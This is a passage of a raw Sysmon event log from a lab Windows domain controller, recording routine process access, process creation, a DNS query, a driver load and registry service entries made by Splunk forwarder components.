10341000x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.955{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:41.614{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.verisign.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 10341000x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.283{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.798{59A5CD1D-8EEB-6005-DF00-00000000A301}35442320C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+201f2b|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6c153|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.798C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 13241300x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.798{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 13241300x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:36:44.798{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.798{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 13241300x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\DisplayNamenpf 13241300x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ErrorControlDWORD (0x00000001) 13241300x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 13241300x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:44.782{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\TypeDWORD (0x00000001) 10341000x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:44.626{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\